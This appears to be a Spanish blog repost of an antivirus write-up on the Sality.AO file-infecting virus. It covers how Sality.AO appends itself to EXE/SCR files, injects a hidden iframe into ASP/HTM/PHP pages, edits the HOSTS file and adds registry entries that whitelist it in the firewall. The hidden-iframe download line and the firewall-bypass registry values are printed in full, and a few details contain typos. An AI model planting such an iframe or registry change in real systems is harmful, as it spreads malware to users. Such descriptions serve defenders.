Efectos
Sality.AO realiza las siguientes
acciones:
- Infecta
los siguientes archivos:
- archivos con extensión EXE y SCR.
- archivos con extensión ASP, HTM y PHP mediante el siguiente script :
<iframe scr=”http://xxxxxxx.pl/rc”width=1 height=2 style=”border:0”></iframe>
Añade este script en los archivos que encuentre en el ordenador afectado.
Este script le permite al virus más descargar malware de diferente tipo en el ordenador afectado. - Reduce el nivel de seguridad del ordenador, ya que se agrega a la lista de aplicaciones autorizadas por el cortafuegos, para evitar ser bloqueado.
- Se conecta a un canal IRC a la espera de recibir instrucciones remotas, como descargar archivos o robar información. Para ello, modifica el archivo HOSTS añadiendo la siguiente cadena: 127.0.01 <bloqueado>F.pl
- Deshabilita la Protección de ficheros de
Windows (WFP) y la comprobación de dichos archivos al iniciar sesión:
- La Protección de ficheros de Windows evita que se reemplacen los archivos de sistema esenciales de Windows. Los programas no deben sobrescribir estos archivos porque el sistema operativo y otros programas los utilizan.
- La herramienta Comprobador de ficheros del sistema comprueba si los archivos protegidos han sido modificados. Si es así, recupera los archivos protegidos originales.
Al deshabilitar ambas características, los archivos protegidos de Windows
pueden ser modificados, lo que podría ocasionar problemas con el sistema
operativo y los programas instalados.
Metodo de
Infección
Sality.AO infecta los archivos con extensión
EXE y SCR que encuentra en el equipo mediante la técnica que consiste en
introducir su código al final del archivo que infecta, para
asegurarse de que será activado cada vez que el archivo infectado sea
ejecutado, pero sin interferir en el funcionamiento del mismo.
También infecta los archivos con extensión ASP,
HTM y PHP que encuentra en el ordenador, añadiéndoles un script que
le permite al vius descargar malware en el ordenador infectado.
Sality.AO modifica el archivo HOSTS
con el objetivo de conectarse a un canal IRC.
Sality.AO crea las siguientes entradas en el Registro de Windows:
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
%sysdir%\winlogon.exe = %sysdir%\winlogon.exe:*:enabled:@shell32.dll,-1
donde %sysdir% es el directorio de sistema de Windows. - HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
%sysdir%\winlogon.exe = %sysdir%\winlogon.exe:*:enabled:@shell32.dll,-1
Crea estas entradas para agregarse a la lista de aplicaciones autorizadas por el cortafuegos. - HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kmixer\Enum
0 = SW\{b7eafdc0-a680-11d0-96d8-00aa0051e51d}\{9B365890-165F-11D0-A195-0020AFD156E4} - HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer UpdateHost = 00, 50, 3D, EB, 75, 51
- HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer
UpdateHost = 00, 50, 3D, EB, 75, 51 - HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Nqzvavfgengbe\Qrfxgbc\5p18r829-rs40-465o-n1qq-3sp9rprs8p87 - svkzncv_.rkr = 08, 00, 00, 00, 06, 00, 00, 00, 40, 09, FD, 1B, 24, 90, C9, 01
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\kmixer\Enum
0 = SW\{b7eafdc0-a680-11d0-96d8-00aa0051e51d}\{9B365890-165F-11D0-A195-0020AFD156E4}
Método de
Propagación
Sality.AO infecta archivos ejecutables con
extensión EXE y SCR, y archivos con extensión ASP, HTM y PHP. Se extiende a
ordenadores cuando los archivos previamente infectados son distribuidos,
entrando en el nuevo sistema a través de los medios habituales: unidades de
almacenamiento externas, mensajes de correo con archivos adjuntos, descargas de
Internet, archivos enviados a través de FTP, redes P2P, etc.
No hay comentarios:
Publicar un comentario